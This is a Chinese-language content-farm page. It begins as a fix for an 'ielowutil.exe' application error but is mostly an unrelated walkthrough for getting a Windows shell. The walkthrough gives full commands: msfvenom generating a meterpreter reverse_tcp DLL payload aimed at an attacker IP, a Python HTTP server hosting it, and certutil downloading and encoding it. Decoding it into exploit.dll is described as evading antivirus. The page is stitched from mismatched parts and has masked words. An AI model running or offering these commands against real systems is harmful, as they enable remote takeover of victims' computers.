前沿拓展:
ielowutil.exe
應(yīng)用程序錯誤解法:
1.檢查電腦是否存在**,請使用百度衛(wèi)士進行木馬查殺。
還是使用 msfvenom 工具為與攻擊機器的反向TCP連接生成有效負載。有效負載的格式在動態(tài)鏈接庫文件 .dll 中設(shè)置。命名為 dll.txt。成功執(zhí)行后,將在 root 目錄中創(chuàng)建文件。現(xiàn)在,要傳輸該文件,我們可以使用 Python One-liner 生成的 HTTP Server。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.51 lport=1234 -f dll > dll.txt
python -m SimpleHTTPServer 80
有效負載已托管在服務(wù)器上,在靶機上執(zhí)行有效負載之前,我們需要在攻擊計算機上啟動**,以捕獲在有效負載執(zhí)行后將生成的會話。
成功啟動攻擊者的**之后再進入靶機。打開 PowerShell 終端。我們需要將有效負載下載到這臺機器上,并且必須謹慎進行。執(zhí)行命令:
certutil -urlcache -split -f http://192.168.1.51/dll.txt dll.txt | certutil -encode dll.txt edll.txt
該文件將被下載為文本文件,并被編碼為另一個文本文件。
現(xiàn)在要執(zhí)行有效載荷以損害受害者,我們必須對其進行解碼。使用 -decode 參數(shù)解碼有效負載并將其保存為 exploit.dll(殺毒軟件不會察覺)。第二運行此 DLL。
回到攻擊機器,以查看我們的**生成并捕獲 meterpreter 的實例。運行 sysinfo 以查看目標系統(tǒng)的詳細信息。
成功使用 Certutil 和惡意編碼的可執(zhí)行文件 Getshell。
拓展知識:
原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請注明出處:http://m.xiesong.cn/23772.html